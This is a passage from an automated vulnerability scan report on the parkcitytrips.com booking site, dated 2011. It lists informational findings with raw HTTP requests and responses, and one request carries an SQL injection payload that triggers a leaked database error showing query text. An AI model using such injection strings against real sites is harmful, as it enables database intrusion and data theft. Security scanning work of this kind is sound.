X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<div style="position:fixed;top:0px;left:0px;height:100%;width:100%;background:url(/images/trans_overlay.png) repeat;z-index:1;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','C
...[SNIP]...
<div id="details_cal" style='padding-bottom:7px;border-bottom:1px solid #ccc;'>
    <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" border="0" id="calEventImg" />

       <div class="meta">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176192]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176194]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176196]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176197]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176198]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176229]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',176193]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...

5.11. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /v002/dbase/php_ajax/specials.php?cloneID=41&eventID=1418&group_id=1293&sDate=2011-02-14&eDate=2011-02-15 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:45:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<div style="position:fixed;top:0px;left:0px;height:100%;width:100%;background:url(/images/trans_overlay.png) repeat;z-index:1;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','C
...[SNIP]...
<div id="details_cal" style='padding-bottom:7px;border-bottom:1px solid #ccc;'>
    <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" border="0" id="calEventImg" />

       <div class="meta">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',175627]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',175981]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...
</span>
                   &nbsp;&nbsp;<a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page Overlay','Click','Deals BookDirect Link',175982]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15"><img src="/images/bookdirect_images/nationalharbor.com/bd_btn_lg.png" border="0">
...[SNIP]...

6. Cross-domain script include  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The response dynamically includes the following script from another domain:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0th7cv2nkmuqi1ajs3h27q70g6; path=/
Connection: close
Content-Length: 372688


                   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
                   <html><head>
                   <meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/parkcity_template.css" />
                                       
                   <script src="http://maps.google.com/maps?file=api&amp;v=2.109&amp;key=ABQIAAAAKZm_5hsUqOpv5DxPV4HooBROL83n-bgKgORxim6v55hn_ZaBnxSpV4rEbp2tOu1bjGh1t-gicIUDyw" type="text/javascript"></script>
...[SNIP]...

7. Content type incorrectly stated  previous
There are 5 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


7.1. http://parkcitytrips.com/booking_results.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /booking_results.php?cloneID=41&rooms=1&nights=1&group_id=-982%27OR%201=1))%20AND%20NVL(ASCII(SUBSTR((SELECT%201%20FROM%20DUAL),1,1)),0)%3E0-- HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: parkcitytrips.com
Cookie: PHPSESSID=rtbf9mia87rdbeie5r94s1lge3; SERVERID=i-07d1a66e
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:46:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 425


Error: A problem was encountered while executing the query <i>SELECT g.id, g.group_id, g.map_config FROM groups_config g WHERE g.group_id = -982'OR 1=1)) AND NVL(ASCII(SUBSTR((SELECT 1 FROM DUAL),1,
...[SNIP]...

7.2. http://parkcitytrips.com/redirect.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /redirect.php HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:45:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 529
Content-Type: text/html; charset=UTF-8
Connection: close

<br />
<b>Notice</b>: Undefined index: clickSourceID in <b>/mnt/book_direct/releases/20110209222312/redirect.php</b> on line <b>110</b><br />
<br />
<b>Notice</b>: Undefined variable: cloneID in <b
...[SNIP]...

7.3. http://parkcitytrips.com/v002/dbase/php_ajax/booking_results_count.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/booking_results_count.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /v002/dbase/php_ajax/booking_results_count.php HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a; PHPSESSID=g2s2u1r1tef6cppsaomcqa7oj7; __utmz=1.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.570101180.1297289442.1297289442.1297289442.1; __utmc=1; __utmb=1.1.10.1297289442; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmb=252597768.2.10.1297289442

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 3

75

7.4. http://parkcitytrips.com/v002/dbase/php_ajax/price_calendar_wrapper.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/price_calendar_wrapper.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /v002/dbase/php_ajax/price_calendar_wrapper.php HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:45:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 769
Content-Type: text/html; charset=UTF-8
Connection: close

<br />
<b>Notice</b>: Undefined index: eventID in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/php_ajax/price_calendar_wrapper.php</b> on line <b>13</b><br />
<br />
<b>Notice</b>: Undefi
...[SNIP]...

7.5. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /v002/dbase/php_ajax/specials.php HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:45:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 727
Content-Type: text/html; charset=UTF-8
Connection: close

<br />
<b>Notice</b>: Undefined index: eventID in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/php_ajax/specials.php</b> on line <b>16</b><br />
<br />
<b>Notice</b>: Undefined offset: 0
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Wed Feb 09 17:53:14 CST 2011.